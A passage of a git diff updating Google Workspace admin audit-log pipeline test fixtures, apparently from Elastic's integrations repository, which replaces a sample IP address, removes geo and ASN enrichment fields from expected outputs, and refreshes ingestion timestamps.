"US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.091090800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"WHITELISTED_GROUPS_UPDATED\",\"parameters\":[{\"name\":\"WHITELISTED_GROUPS\",\"value\":\"a,b,c\"}]}}", + "ingested": "2021-12-09T13:38:43.717749700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"WHITELISTED_GROUPS_UPDATED\",\"parameters\":[{\"name\":\"WHITELISTED_GROUPS\",\"value\":\"a,b,c\"}]}}", "provider": "admin", "action": "WHITELISTED_GROUPS_UPDATED", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log index c028ff6ba1c..a240d727301 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log @@ -1,8 +1,8 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_ALL_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"CHANGE_LICENSE_AUTO_ASSIGN","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"SKU_NAME","value":"sku"},{"name":"PRODUCT_NAME","value":"product"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"UPDATE_DYNAMIC_LICENSE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_ALL_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"CHANGE_LICENSE_AUTO_ASSIGN","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"SKU_NAME","value":"sku"},{"name":"PRODUCT_NAME","value":"product"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"UPDATE_DYNAMIC_LICENSE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json index b234e175c0e..c405f24e075 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -32,35 +32,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.574923100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", + "ingested": "2021-12-09T13:38:45.984529200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "ORG_USERS_LICENSE_ASSIGNMENT", "id": "1", @@ -90,7 +72,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -112,35 +94,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.574932100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_ALL_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", + "ingested": "2021-12-09T13:38:45.984540Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_ALL_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "ORG_ALL_USERS_LICENSE_ASSIGNMENT", "id": "1", @@ -170,7 +134,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -192,35 +156,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.574934500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", + "ingested": "2021-12-09T13:38:45.984545800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "USER_LICENSE_ASSIGNMENT", "id": "1", @@ -250,7 +196,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -272,35 +218,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.574936700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"CHANGE_LICENSE_AUTO_ASSIGN\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", + "ingested": "2021-12-09T13:38:45.984551500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"CHANGE_LICENSE_AUTO_ASSIGN\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "CHANGE_LICENSE_AUTO_ASSIGN", "id": "1", @@ -330,7 +258,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -352,35 +280,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.574938600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", + "ingested": "2021-12-09T13:38:45.984555500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "USER_LICENSE_REASSIGNMENT", "id": "1", @@ -410,7 +320,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -432,35 +342,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.574940600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", + "ingested": "2021-12-09T13:38:45.984560400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "ORG_LICENSE_REVOKE", "id": "1", @@ -490,7 +382,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -512,35 +404,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.574942600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", + "ingested": "2021-12-09T13:38:45.984565500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "USER_LICENSE_REVOKE", "id": "1", @@ -570,7 +444,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -592,35 +466,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.574944500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"UPDATE_DYNAMIC_LICENSE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", + "ingested": "2021-12-09T13:38:45.984571100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"UPDATE_DYNAMIC_LICENSE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "UPDATE_DYNAMIC_LICENSE", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log index 69c376c4453..67fb978c259 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log @@ -1,31 +1,31 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ACTION_CANCELLED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ACTION_REQUESTED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 